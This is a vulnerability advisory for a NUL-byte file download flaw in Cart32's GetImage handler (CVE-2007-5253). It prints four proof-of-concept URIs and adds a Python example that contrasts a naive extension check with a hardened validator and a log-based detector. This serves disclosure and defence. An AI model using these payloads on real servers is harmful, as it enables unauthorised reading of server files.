Cart32 GetImage Arbitrary File Download Vulnerability
BID:25928
Info
| Bugtraq ID: | 25928 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-5253 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 04 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Paul Craig is credited with the discovery of this vulnerability. |
| Vulnerable: | McMurtrey/Whitaker & Associates Cart32 6.3; McMurtrey/Whitaker & Associates Cart32 6.2; McMurtrey/Whitaker & Associates Cart32 6.1 |
| Not Vulnerable: | McMurtrey/Whitaker & Associates Cart32 6.4 |
Discussion
Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
This issue affects Cart32 6.3; prior versions are also vulnerable.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png
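The proof-of-concept URIs above all follow one pattern: a URL-encoded NUL byte (%00) placed between the requested file name and an image extension the handler expects. The following Python example is added here and is not part of the original advisory or of Cart32's own code. It shows why a suffix check on the raw parameter value accepts that pattern while a NUL-terminated file API would open the shorter name, a hardened validator that decodes first and rejects NUL bytes, path components and unlisted extensions, and a detection pass over constructed Common Log Format lines. The parameter name ImageName and the GetImage path come from the advisory; the extension allowlist, the log format and every sample value are assumptions made for the example.

```python
from __future__ import annotations
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist: the four extensions that appear in the advisory's PoC URIs.
ALLOWED_EXTENSIONS = {".gif", ".jpg", ".png", ".pdf"}


def naive_extension_check(raw_name: str) -> bool:
    """Weak check that only looks at the suffix of the raw (still URL-encoded) value.
    'somefile.txt%00.gif' ends in '.gif' and is accepted."""
    return any(raw_name.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS)


def effective_filename(raw_name: str) -> str:
    """The name a NUL-terminated string API would actually use: decode once,
    then stop at the first NUL byte."""
    return unquote(raw_name).split("\x00", 1)[0]


def validate_image_name(decoded_name: str) -> tuple[bool, str]:
    """Hardened check on the already-decoded parameter. Returns (accepted, reason).
    Rejects NUL bytes, path separators and traversal components, then enforces
    the extension allowlist on the whole decoded name."""
    if "\x00" in decoded_name:
        return False, "NUL byte in filename"
    if "/" in decoded_name or "\\" in decoded_name or decoded_name in ("", ".", ".."):
        return False, "path separator or traversal component"
    suffix = PurePosixPath(decoded_name).suffix.lower()
    if suffix not in ALLOWED_EXTENSIONS:
        return False, f"extension {suffix or '<none>'} not allowed"
    return True, "ok"


def check_request_parameter(raw_name: str) -> tuple[bool, str]:
    """Decode the raw query value exactly once, then validate it."""
    return validate_image_name(unquote(raw_name))


# Constructed sample log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Oct/2007:10:00:01 +0000] "GET /scripts/c32web.exe/GetImage?ImageName=logo.gif HTTP/1.1" 200 4311
192.0.2.11 - - [04/Oct/2007:10:00:02 +0000] "GET /scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif HTTP/1.1" 200 812
192.0.2.12 - - [04/Oct/2007:10:00:03 +0000] "GET /scripts/c32web.exe/GetImage?ImageName=banner.png HTTP/1.1" 200 9020
"""

# client IP, then the request target of a GET/POST line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def find_suspicious_requests(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, reason) for every GetImage request whose ImageName
    value fails the hardened validator. parse_qs decodes the value once."""
    hits: list[tuple[str, str]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/getimage"):
            continue
        for name in parse_qs(parts.query, keep_blank_values=True).get("ImageName", []):
            ok, reason = validate_image_name(name)
            if not ok:
                hits.append((ip, reason))
    return hits


if __name__ == "__main__":
    poc = "somefile.txt%00.gif"
    print("naive check accepts:", naive_extension_check(poc))
    print("file actually opened:", effective_filename(poc))
    print("hardened check:", check_request_parameter(poc))
    print("suspicious requests:", find_suspicious_requests(SAMPLE_LOG))
```

The validator decodes the value exactly once before inspecting it, which is the property the naive check lacks: a suffix test on the encoded string sees ".gif", while the file layer sees the decoded bytes up to the NUL. The log scan reuses the same validator so that detection and mitigation cannot drift apart.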
Solution / Fix
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
References
References:
- Cart32 Arbitrary File Download Vulnerability ([email protected])
- Cart32 Homepage (McMurtrey/Whitaker & Associates)